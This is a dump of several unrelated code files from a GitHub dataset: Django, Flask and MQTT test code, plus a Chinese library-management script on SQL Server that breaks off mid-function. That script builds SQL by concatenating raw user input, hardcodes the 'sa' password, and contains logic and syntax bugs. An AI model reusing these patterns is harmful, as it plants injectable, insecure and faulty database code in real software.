== \"R\":\n bash(file, \"R\")\n if args.s == \"S\":\n bash(file, \"S\")\n if args.b == \"B\":\n bash(file, \"B\")\n if args.a == \"A\":\n bash(file, \"A\")\n if args.f == \"F\":\n bash(file, \"F\")\n if args.v == \"V\":\n bash(file, \"V\")\n\n # En rads översättning\n if args.lang == \"St\":\n stjarnsprak(file)\n if args.lang == \"Ro\":\n rovarsprak(file)\n if args.lang == \"Sv\":\n svenskarovarsprak(file)\n if args.lang == \"Be\":\n bebissprak(file)\n if args.lang == \"Al\":\n allspraket(file)\n if args.lang == \"Fi\":\n fikonspraket(file)\n if args.lang == \"Vi\":\n visksprak(file)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JonnyWDeveloper/Python_Traduce_Robbers_Language","sub_path":"sprak.py","file_name":"sprak.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"sv","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24908051618","text":"from django.contrib.auth import login\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework.throttling import AnonRateThrottle\nfrom rest_framework.views import APIView\n\n\nclass SustainedAnon(AnonRateThrottle):\n rate = \"100/day\"\n\n\nclass BurstAnon(AnonRateThrottle):\n rate = \"5/minute\"\n\n\nclass HawcObtainAuthToken(ObtainAuthToken):\n throttle_classes = (BurstAnon, SustainedAnon)\n\n\nhawc_obtain_auth_token = HawcObtainAuthToken.as_view()\n\n\nclass HawcValidateAuthToken(APIView):\n throttle_classes = (BurstAnon, SustainedAnon)\n permission_classes = [IsAuthenticated]\n\n def 
get(self, request, format=None):\n        if \"login\" in request.query_params:\n            login(request, request.user)\n        return Response({\"valid\": True})\n","repo_name":"shapiromatron/hawc","sub_path":"hawc/apps/myuser/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"21022548370","text":"from app import app\nfrom flask import jsonify\nfrom flask import request\nfrom tempfile import TemporaryFile\n\nimport pandas as pd\nimport numpy as np\nimport csv\n\nfrom scipy.io import loadmat\nfrom scipy.optimize import minimize\n\nfrom datetime import datetime\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n    return \"Hello, World!\"\n\n\ndef sigmoid(z):\n\treturn (1 / (1 + np.exp(-z)))\n\ndef lrcostFunctionReg(theta, X, y, reg, return_grad=False):\n\tm = y.size\n\th = sigmoid(X.dot(theta))\n\t\n\tJ = -1*(1/m)*(np.log(h).T.dot(y)+np.log(1-h).T.dot(1-y)) + (reg/(2*m))*np.sum(np.square(theta[1:]))\n\t\n\tif np.isnan(J[0]):\n\t\treturn(np.inf)\n\treturn (J[0])\n\ndef cost(theta, X, y, learningRate): \n\ttheta = np.matrix(theta)\n\tX = np.matrix(X)\n\ty = np.matrix(y)\n\tfirst = np.multiply(-y, np.log(sigmoid(X * theta.T)))\n\tsecond = np.multiply((1 - y), np.log(1 - sigmoid(X * theta.T)))\n\treg = (learningRate / (2 * len(X))) * np.sum(np.power(theta[:,1:theta.shape[1]], 2))\n\treturn np.sum(first - second) / (len(X)) + reg\n\ndef gradient_with_loop(theta, X, y, learningRate): \n    theta = np.matrix(theta)\n    X = np.matrix(X)\n    y = np.matrix(y)\n\n    parameters = int(theta.ravel().shape[1])\n    grad = np.zeros(parameters)\n\n    error = sigmoid(X * theta.T) - y\n\n    for i in range(parameters):\n        term = np.multiply(error, X[:,i])\n\n        if (i == 0):\n            grad[i] = np.sum(term) / len(X)\n        else:\n            grad[i] = (np.sum(term) / len(X)) + ((learningRate / len(X)) * theta[:,i])\n\n    return grad\n\ndef gradient(theta, X, y, learningRate): \n\ttheta = np.matrix(theta)\n\tX = np.matrix(X)\n\ty = np.matrix(y)\n\n\tparameters = int(theta.ravel().shape[1])\n\terror = sigmoid(X * theta.T) - y\n\n\tgrad = ((X.T * error) / len(X)).T + ((learningRate / len(X)) * theta)\n\n\t# intercept gradient is not regularized\n\tgrad[0, 0] = np.sum(np.multiply(error, X[:,0])) / len(X)\n\n\tresult = np.array(grad).ravel()\n\n\treturn result\n\ndef oneVsAll(X, y, num_labels, lambda_reg):\n\tm, n = X.shape\n\tall_theta = np.zeros((num_labels, n + 1))\n\tX = np.column_stack((np.ones((m,1)), X))\n\n\tfor c in range(num_labels):\n\t\t# initial theta for c/class\n\t\tinitial_theta = np.zeros((n + 1, 1))\n\t\tprint(\"Training {:d} out of {:d} categories...\".format(c+1, num_labels))\n\t\tmyargs = (X, (y%10==c).astype(int), lambda_reg, True)\n\t\ttheta = minimize(lrcostFunctionReg, x0=initial_theta, args=myargs, options={'disp': True, 'maxiter':13}, method=\"Newton-CG\", jac=True)\n\t\tall_theta[c,:] = theta[\"x\"]\n\n\treturn all_theta\n\ndef one_vs_all(features, classes, n_labels, reg):\n\trows = features.shape[0]\n\tparams = features.shape[1]\n\tall_theta = np.zeros((n_labels, params + 1))\n\tX = np.insert(features, 0, values=np.ones(rows), axis=1) \n\n\tfor i in range(1, n_labels + 1):\n\t\ttheta = np.zeros(params + 1)\n\t\ty_i = np.array([1 if label == i else 0 for label in classes])\n\t\ty_i = np.reshape(y_i, (rows, 1))\n\t\tfmin = minimize(fun=cost, x0=theta, args=(X, y_i, reg), method='TNC', jac=gradient_with_loop)\n\t\tall_theta[i-1,:] = fmin.x\n\n\treturn all_theta\n\ndef predict_all(X, all_theta): \n\trows = 
X.shape[0]\n\tparams = X.shape[1]\n\tnum_labels = all_theta.shape[0]\n\n\tX = np.insert(X, 0, values=np.ones(rows), axis=1)\n\tX = np.matrix(X)\n\tall_theta = np.matrix(all_theta)\n\n\th = sigmoid(X * all_theta.T)\n\n\th_argmax = np.argmax(h, axis=1)\n\th_argmax = h_argmax + 1\n\n\treturn h_argmax\n\ndef getY():\n\twith open('app/training-results.csv', 'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile)\n\t\tresult = []\n\t\tfor row in spamreader:\n\t\t\tscenario = int(row[0])\n\t\t\tresult.append([scenario])\n\n\treturn np.asarray(result)\n\nepoch = datetime.utcfromtimestamp(0)\ndef unix_time_millis(dt):\n\treturn (dt - epoch).total_seconds() * 1000.0\n\ndef getX():\n\twith open('app/heartbeat-training.csv', 'r') as csvfile:\n\t\tspamreader = csv.reader(csvfile)\n\t\tresult = []\n\t\tfor row in spamreader:\n\t\t\tdata_row = []\n\t\t\tfor idx, val in enumerate(row):\n\t\t\t\tif idx == 4:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\t\t\t\telif idx == 5 or idx == 6:\n\t\t\t\t\ttimes = datetime.strptime(row[idx], '%Y-%m-%d %H:%M:%S')\n\t\t\t\t\tdata_row.append(unix_time_millis(times))\n\t\t\t\telif idx >= 7 and idx <= 16:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\t\t\t\telse:\n\t\t\t\t\tdata_row.append(float(row[idx]))\n\n\t\t\tresult.append(data_row)\n\n\tdata = np.array(result, dtype=np.float128)\n\n\treturn np.c_[np.ones((data.shape[0],1)), data]\n\n\n# defined scenarios\n# 0 - resting\n# 1 - sleeping\n# 3 - exercising\n# 4 - overdose\n@app.route('/scenarios', methods = ['POST'])\ndef scenarios():\n\ty = getY()\n\tX = getX()\n\n\t# Add constant for intercept\n\tX = np.c_[np.ones((X.shape[0],1)), X]\n\n\tprint('X: {} (with intercept)'.format(X.shape))\n\tprint('y: {}'.format(y.shape))\n\n\tall_theta = one_vs_all(X, y, 4, 1)\n\n\tprint(all_theta, np.shape(all_theta))\n\n\tscenario = 3\n\tif request.data:\n\t\ttest_x = request.data\n\t\ttest_x = np.array(test_x, dtype=np.float128)\n\t\tnew_x = np.c_[np.ones((test_x.shape[0],1)), test_x]\n\t\tnew_x = np.c_[np.ones((new_x.shape[0],1)), new_x]\n\n\t\tscenario = predict_all(new_x, all_theta)\n\n\treturn jsonify(scenario=scenario)\n\ndef getAccuracy():\n\ty = getY()\n\tX = getX()\n\tX = np.c_[np.ones((X.shape[0],1)), X]\n\n\tall_theta = one_vs_all(X, y, 3, 1) \n\n\ty_pred = predict_all(X, all_theta) \n\tcorrect = [1 if a == b else 0 for (a, b) in zip(y_pred, y)] \n\taccuracy = (sum(map(int, correct)) / float(len(correct))) \n\n\tprint('accuracy = {0}%'.format(accuracy * 100))","repo_name":"karen-ho/scenario-service","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35646744126","text":"import markpickle\r\n\r\n\r\ndef test_simple_bytes():\r\n marks = \"![data](data:image/png;base64,aGVsbG8gd29ybGQ=)\"\r\n config = markpickle.Config()\r\n # config.root = \"Top level heading\"\r\n result = markpickle.loads(marks, config)\r\n assert result == b\"hello world\"\r\n\r\n\r\ndef test_bytes_lists():\r\n list_of_binary = [b\"hello world\", b\"hello universe\"]\r\n config = markpickle.Config()\r\n config.serialize_bytes_mime_type = \"application/octet-stream\"\r\n result = markpickle.dumps(list_of_binary, config)\r\n assert (\r\n result == \"- ![bytes](data:application/octet-stream;base64,aGVsbG8gd29ybGQ=)\\n\"\r\n \"- ![bytes](data:application/octet-stream;base64,aGVsbG8gdW5pdmVyc2U=)\\n\"\r\n )\r\n\r\n\r\ndef test_bytes_dict():\r\n dictionaries_of_binary = {\"animal\": b\"hello world\", \"name\": 
b\"hello universe\"}\r\n config = markpickle.Config()\r\n config.serialize_bytes_mime_type = \"application/octet-stream\"\r\n result = markpickle.dumps(dictionaries_of_binary, config)\r\n assert result == (\r\n \"# animal\\n\\n\"\r\n \"![bytes](data:application/octet-stream;base64,aGVsbG8gd29ybGQ=)\\n\\n\"\r\n \"# name\\n\\n\"\r\n \"![bytes](data:application/octet-stream;base64,aGVsbG8gdW5pdmVyc2U=)\\n\"\r\n )\r\n","repo_name":"matthewdeanmartin/markpickle","sub_path":"test/test_deserialize/test_bytes.py","file_name":"test_bytes.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"470458609","text":"\"\"\"Unit tests MQTT for Home Assistant covers.\"\"\"\n\nimport asyncio\nfrom asyncio import Task\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Set\nfrom unittest.mock import AsyncMock\n\nimport pytest\nfrom _pytest.logging import LogCaptureFixture # pylint: disable=import-private-name\nfrom aiomqtt import Client\n\nfrom tests.conftest_data import CONFIG_CONTENT\nfrom tests.conftest_data import EXTENSION_HARDWARE_DATA_CONTENT\nfrom tests.conftest_data import HARDWARE_DATA_CONTENT\nfrom unipi_control.config import DEVICE_CLASSES\nfrom unipi_control.integrations.covers import CoverMap\nfrom unipi_control.mqtt.discovery.covers import HassCoversMqttPlugin\nfrom unipi_control.neuron import Neuron\n\n\nclass TestHappyPathHassCoversMqttPlugin:\n @pytest.mark.asyncio()\n @pytest.mark.parametrize(\n \"config_loader\", [(CONFIG_CONTENT, HARDWARE_DATA_CONTENT, EXTENSION_HARDWARE_DATA_CONTENT)], indirect=True\n )\n async def test_init_tasks(self, neuron: Neuron, covers: CoverMap, caplog: LogCaptureFixture) -> None:\n \"\"\"Test MQTT output after initialize Home Assistant covers.\"\"\"\n covers.init()\n mock_mqtt_client: AsyncMock = AsyncMock(spec=Client)\n plugin: HassCoversMqttPlugin = HassCoversMqttPlugin(neuron=neuron, mqtt_client=mock_mqtt_client, covers=covers)\n\n tasks: Set[Task] = set()\n\n await plugin.init_tasks(tasks)\n await asyncio.gather(*tasks)\n\n for task in tasks:\n assert task.done() is True\n\n logs: List[str] = [record.getMessage() for record in caplog.records]\n\n assert (\n \"[MQTT] [homeassistant/cover/mocked_unipi/mocked_blind_topic_name/config] \"\n \"Publishing message: {\"\n '\"name\": \"MOCKED_FRIENDLY_NAME - BLIND\", '\n '\"unique_id\": \"mocked_unipi_mocked_blind_topic_name\", '\n '\"object_id\": \"mocked_blind_topic_name\", '\n '\"device_class\": \"blind\", '\n '\"command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/set\", '\n '\"state_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/state\", '\n '\"qos\": 2, '\n '\"optimistic\": false, '\n '\"device\": {'\n '\"name\": \"MOCKED UNIPI\", '\n '\"identifiers\": \"mocked_unipi\", '\n '\"model\": \"MOCKED_NAME MOCKED_MODEL\", '\n '\"manufacturer\": \"Unipi technology\", '\n '\"suggested_area\": \"MOCKED AREA\"'\n \"}, \"\n '\"position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position\", '\n '\"set_position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position/set\", '\n '\"tilt_status_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt\", '\n '\"tilt_command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt/set\"'\n \"}\" in logs\n )\n assert (\n \"[MQTT] [homeassistant/cover/mocked_unipi/mocked_shutter_topic_name/config] \"\n \"Publishing message: {\"\n '\"name\": \"MOCKED_FRIENDLY_NAME - 
SHUTTER\", '\n '\"unique_id\": \"mocked_unipi_mocked_shutter_topic_name\", '\n '\"object_id\": \"mocked_shutter_topic_name\", '\n '\"device_class\": \"shutter\", '\n '\"command_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/set\", '\n '\"state_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/state\", '\n '\"qos\": 2, '\n '\"optimistic\": false, '\n '\"device\": {'\n '\"name\": \"MOCKED UNIPI\", '\n '\"identifiers\": \"mocked_unipi\", '\n '\"model\": \"MOCKED_NAME MOCKED_MODEL\", '\n '\"manufacturer\": \"Unipi technology\", '\n '\"suggested_area\": \"MOCKED AREA\"'\n \"}\"\n \"}\" in logs\n )\n assert len(logs) == 3\n\n @pytest.mark.parametrize(\n (\"config_loader\", \"expected\"),\n [\n (\n (CONFIG_CONTENT, HARDWARE_DATA_CONTENT, EXTENSION_HARDWARE_DATA_CONTENT),\n [\n {\n \"message\": {\n \"name\": \"MOCKED_FRIENDLY_NAME - BLIND\",\n \"unique_id\": \"mocked_unipi_mocked_blind_topic_name\",\n \"object_id\": \"mocked_blind_topic_name\",\n \"device_class\": \"blind\",\n \"command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/set\",\n \"state_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/state\",\n \"qos\": 2,\n \"optimistic\": False,\n \"device\": {\n \"name\": \"MOCKED UNIPI\",\n \"identifiers\": \"mocked_unipi\",\n \"model\": \"MOCKED_NAME MOCKED_MODEL\",\n \"manufacturer\": \"Unipi technology\",\n \"suggested_area\": \"MOCKED AREA\",\n },\n \"position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position\",\n \"set_position_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/position/set\",\n \"tilt_status_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt\",\n \"tilt_command_topic\": \"mocked_unipi/mocked_blind_topic_name/cover/blind/tilt/set\",\n },\n \"topic\": \"homeassistant/cover/mocked_unipi/mocked_blind_topic_name/config\",\n },\n {\n \"message\": {\n \"name\": \"MOCKED_FRIENDLY_NAME - SHUTTER\",\n \"unique_id\": \"mocked_unipi_mocked_shutter_topic_name\",\n \"object_id\": \"mocked_shutter_topic_name\",\n \"device_class\": \"shutter\",\n \"command_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/set\",\n \"state_topic\": \"mocked_unipi/mocked_shutter_topic_name/cover/shutter/state\",\n \"qos\": 2,\n \"optimistic\": False,\n \"device\": {\n \"name\": \"MOCKED UNIPI\",\n \"identifiers\": \"mocked_unipi\",\n \"model\": \"MOCKED_NAME MOCKED_MODEL\",\n \"manufacturer\": \"Unipi technology\",\n \"suggested_area\": \"MOCKED AREA\",\n },\n },\n \"topic\": \"homeassistant/cover/mocked_unipi/mocked_shutter_topic_name/config\",\n },\n ],\n ),\n ],\n indirect=[\"config_loader\"],\n )\n def test_discovery_message(self, neuron: Neuron, covers: CoverMap, expected: List[Dict[str, Any]]) -> None:\n \"\"\"Test MQTT topic and message when publish a feature.\"\"\"\n covers.init()\n mock_mqtt_client: AsyncMock = AsyncMock(spec=Client)\n plugin: HassCoversMqttPlugin = HassCoversMqttPlugin(neuron=neuron, mqtt_client=mock_mqtt_client, covers=covers)\n\n for index, cover in enumerate(covers.by_device_classes(DEVICE_CLASSES)):\n topic, message = plugin.hass.get_discovery(cover)\n\n assert message == expected[index][\"message\"]\n assert topic == expected[index][\"topic\"]\n","repo_name":"superbox-dev/unipi-control","sub_path":"tests/unit/mqtt/discovery/test_covers.py","file_name":"test_covers.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"14485089700","text":"from .telenium_process import 
TeleniumTestProcess\nfrom .common import skip_screen_checks\nfrom .common import ordered\n\n\nclass TrashMessage(TeleniumTestProcess):\n \"\"\"Trash Screen Functionality Testing\"\"\"\n\n @skip_screen_checks\n @ordered\n def test_delete_trash_message(self):\n \"\"\"Delete Trash message permanently from trash message listing\"\"\"\n # Checking current Screen(Inbox screen)\n self.assert_wait_no_except('//ScreenManager[@current]', timeout=15, value='inbox')\n # Method to open side navbar\n self.open_side_navbar()\n # this is for opening Trash screen\n self.cli.wait_click('//NavigationItem[@text=\\\"Trash\\\"]', timeout=2)\n # Checking Trash Screen\n self.assertExists(\"//ScreenManager[@current=\\\"trash\\\"]\", timeout=5)\n # This is for swiping message to activate delete icon.\n self.cli.wait_drag(\n '//Trash[0]//TwoLineAvatarIconListItem[0]/BoxLayout[1]',\n '//Trash[0]//TwoLineAvatarIconListItem[0]/BoxLayout[2]', 2, timeout=5)\n # Checking the \"trash-can\" is rendered\n self.assertExists(\n \"//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon~=\\\"trash-can\\\"]\", timeout=2)\n # Delete icon is enabled\n self.cli.setattr('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton', 'disabled', False)\n # Checking the Dialog popup is closed\n self.assertNotExists('//MDDialog[@open]', timeout=5)\n # Checking the delete icon is rendered and functional\n self.assertExists('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon=\\\"trash-can\\\"]', timeout=5)\n # Click on the delete icon to delete the current message\n self.cli.wait_click('//MDList[0]/CutsomSwipeToDeleteItem[0]//MDIconButton[@icon=\\\"trash-can\\\"]', timeout=5)\n # Checking Confirm Popup is Opened\n self.assertExists('//MDDialog[@open]', timeout=5)\n # Checking the popup's 'Yes' button is rendered.\n self.assertExists(\"//MDDialog//MDFlatButton[@text=\\\"Yes\\\"]\", timeout=5)\n # Clicking on 'Yes' Button on Popup to confirm delete.\n self.cli.wait_click('//MDFlatButton[@text=\\\"Yes\\\"]', timeout=5)\n # Checking the Dialog is closed on click \"Yes\" button\n self.assertNotExists('//MDDialog[@open]', timeout=5)\n # Checking the message is rendered on Trash screen\n self.assertExists('//MDList[0]/CutsomSwipeToDeleteItem[0]', timeout=5)\n # Checking Current screen is Trash Screen\n self.assertExists(\"//ScreenManager[@current=\\\"trash\\\"]\", timeout=5)\n","repo_name":"shekhar-cis/kivy_working_mock","sub_path":"PyBitmessage/src/bitmessagekivy/tests/test_trash_message.py","file_name":"test_trash_message.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31549457000","text":"'''\r\n以下代码在MSSQL中运行创建库\r\ncreate database books\r\non primary\r\n(name='books',filename='d:\\books\\books.mdf')\r\nLOG on\r\n(name ='books_log',filename = 'd:\\books\\books_log.ldf')\r\nuse books\r\n\r\ncreate table admin(\r\naid nchar(4) primary key,\r\npw nvarchar(20))\r\n\r\ncreate table book(\r\nbookid nchar(4)primary key,\r\nbookname nvarchar(20),\r\nauthor nvarchar(20),\r\npublisher nvarchar(20),\r\npubdate date,\r\nprice float,\r\nsummary nvarchar(50)\r\nquantity nchar(1))\r\n\r\ncreate table rtype(\r\nrtype nchar(2)primary key ,\r\nrtname nvarchar(20),\r\nrtbooks tinyint,\r\nrtdays tinyint)\r\n\r\ncreate table reader(\r\nrid nchar(4)primary key,\r\nrname nvarchar(20),\r\nrsex nvarchar(4),\r\nrunit nvarchar(20),\r\nrtel nvarchar(13),\r\nrtype nchar(2),\r\nrmoney float,\r\npw nvarchar(20)\r\nforeign key (rtype) references 
rtype(rtype))\r\n\r\ncreate table borrow(\r\nid int identity(1,1) primary key,\r\nbookid nchar(4),\r\nrid nchar(4),\r\nbdate date,\r\nrdate date,\r\nrm float\r\nforeign key(bookid)references book(bookid),\r\nforeign key(rid)references reader(rid))\r\n'''\r\n\r\nimport os\r\nimport pymssql\r\n\r\ndef createdb():\r\n conn = pymssql.connect(host='.', database='master', user='sa', password='1234')\r\n cur = conn.cursor()\r\n conn.autocommit(True)\r\n sql = '''\r\n create database books\r\n on primary \r\n (name='books',filename='d:\\books\\books.mdf')\r\n LOG on \r\n (name ='books_log',filename = 'd:\\books\\books_log.ldf')\r\n\r\n '''\r\n cur.execute(sql)\r\n print('数据库建立完毕')\r\n\r\ndef first():\r\n print('===图书管理系统===')\r\n conn = pymssql.connect(host='.', database='master', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"select name from sys.databases where name ='books'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n ch = input('第一次启动程序,是否新建数据库(Y/N):')\r\n if ch == 'y' or ch == 'Y':\r\n createdb()\r\n else:\r\n print('退出系统')\r\n os.system('pause')\r\n exit()\r\n\r\ndef adminlogin(): #管理员登录\r\n os.system(\"cls\")\r\n print(\"===管理员登录===\")\r\n id=input(\"请输入管理员编号:\")\r\n pw=input(\"请输入管理员密码:\")\r\n #连接数据库BOOKS\r\n conn=pymssql.connect(host='.',database='BOOKS',user='sa',password='1234')\r\n cur=conn.cursor()\r\n sql=\"SELECT * FROM admin WHERE aid='\"+id+\"' and pw='\"+pw+\"'\"\r\n cur.execute(sql)\r\n data=cur.fetchall()\r\n if len(data)==0:\r\n print(\"编号或密码错误\")\r\n os.system(\"pause\")\r\n else:\r\n adminmain()\r\n conn.close()\r\n\r\ndef adminmain(): #管理员界面\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统(管理员)===\")\r\n print(\"1、借阅管理\")\r\n print(\"2、图书管理\")\r\n print(\"3、读者管理\")\r\n print(\"9、管理员管理\")\r\n print(\"0、退出系统\")\r\n ch=input(\"请选择操作:\")\r\n if ch=='1':\r\n borrowm()\r\n elif ch=='2':\r\n bookm()\r\n elif ch=='3':\r\n readerm()\r\n elif ch=='9':\r\n adminm()\r\n elif ch=='0':\r\n exit()\r\n\r\ndef bookm(): # 图书管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理===\")\r\n print(\"1、添加图书\")\r\n print(\"2、删除图书\")\r\n print(\"3、查询图书\")\r\n print(\"4、修改图书\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n booki()\r\n elif ch == '2':\r\n bookd()\r\n elif ch == '3':\r\n books()\r\n elif ch == '4':\r\n booku()\r\n elif ch == '0':\r\n break\r\n\r\ndef booki(): # 图书插入\r\n os.system(\"cls\")\r\n print(\"===添加图书===\")\r\n print(\"请输入图书信息:\")\r\n bookid = input(\"图书编号:\")\r\n bookname = input(\"书名:\")\r\n author = input(\"作者:\")\r\n publisher = input(\"出版社:\")\r\n pubdate = input(\"出版日期:\")\r\n price = input(\"价格:\")\r\n summary = input(\"简介:\")\r\n quantity = input(\"是否被借阅:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO book VALUES('\" + bookid + \\\r\n \"','\" + bookname + \\\r\n \"','\" + author + \\\r\n \"','\" + publisher + \\\r\n \"','\" + pubdate + \\\r\n \"','\" + price + \\\r\n \"','\" + summary + \\\r\n \"','\" + quantity + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"图书添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef bookd(): # 图书删除\r\n os.system(\"cls\")\r\n print(\"===删除图书===\")\r\n print(\"请输入欲删除图书编号:\")\r\n bookid = input(\"图书编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if 
len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"图书删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef books(): # 图书查询\r\n os.system(\"cls\")\r\n print(\"===查询图书===\")\r\n print(\"请输入你想查找的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql=\"SELECT * FROM book WHERE bookid='\"+bookid+\"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef booku(): # 图书修改\r\n os.system(\"cls\")\r\n print(\"===修改图书===\")\r\n print(\"请输入你想修改的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该书编号\")\r\n else:\r\n bookname = input(\"书名:\")\r\n author = input(\"作者:\")\r\n publisher = input(\"出版社:\")\r\n pubdate = input(\"出版日期:\")\r\n price = input(\"价格:\")\r\n summary = input(\"简介:\")\r\n sql=\"UPDATE book SET bookname=bookname+%s,author=author+%s,publisher=publisher+%s,pubdate=pubdate+%s,\\\r\n price=price+%s,summary=summary+%s WHERE bookid='\"+bookid+\"'\" %(bookname,author,publisher,pubdate,price,summary)\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"图书修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef borrowm(): # 借阅管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===借阅管理===\")\r\n print(\"1、借阅图书\")\r\n print(\"2、归还图书\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n borrow_book()\r\n elif ch == '2':\r\n return_book()\r\n elif ch == '0':\r\n break\r\n\r\ndef borrow_book(): # 图书借阅\r\n os.system(\"cls\")\r\n print(\"===借阅图书===\")\r\n print(\"请输入你想借阅的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql = \"SELECT quantity FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n quantity = cur.fetchone()\r\n if quantity == 0:\r\n print(\"此书已被借阅,借阅信息如下:\")\r\n sql = \"SELECT * FROM borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n else:\r\n print(\"请输入借阅者的读者编号:\")\r\n rid = input(\"读者编号\")\r\n date = input(\"借书日期\")\r\n rdate = input(\"归还日期\")\r\n rm = input(\"逾期金额\")\r\n sql = \"INSERT INTO borrow VALUES('\" + bookid + \\\r\n \"','\" + rid + \\\r\n \"','\" + date + \\\r\n \"','\" + rdate + \\\r\n \"','\" + rm + \\\r\n \"')\"\r\n cur.execute(sql)\r\n sql = \"UPDATE book SET quantity=0 WHERE quantity='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书借阅成功\")\r\n os.system(\"pause\")\r\n\r\ndef return_book(): # 图书归还\r\n os.system(\"cls\")\r\n print(\"===归还图书===\")\r\n print(\"请输入你想归还的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n 
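    # NOTE: the stock bookkeeping here is broken in two ways: the UPDATE in
    # borrow_book() above (and its quantity=1 twin later in this function)
    # says WHERE quantity='...' instead of WHERE bookid='...', and neither
    # UPDATE is followed by conn.commit(), so the flag never persists.
    # A hedged sketch of the intended statement, using pymssql's %s
    # placeholders (which also avoid the SQL injection risk of the string
    # concatenation used throughout this file):
    #     cur.execute('UPDATE book SET quantity=0 WHERE bookid=%s', (bookid,))
    #     conn.commit()
    # The CREATE TABLE script in the module docstring is likewise missing
    # commas after summary nvarchar(50), pw nvarchar(20) and rm float.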
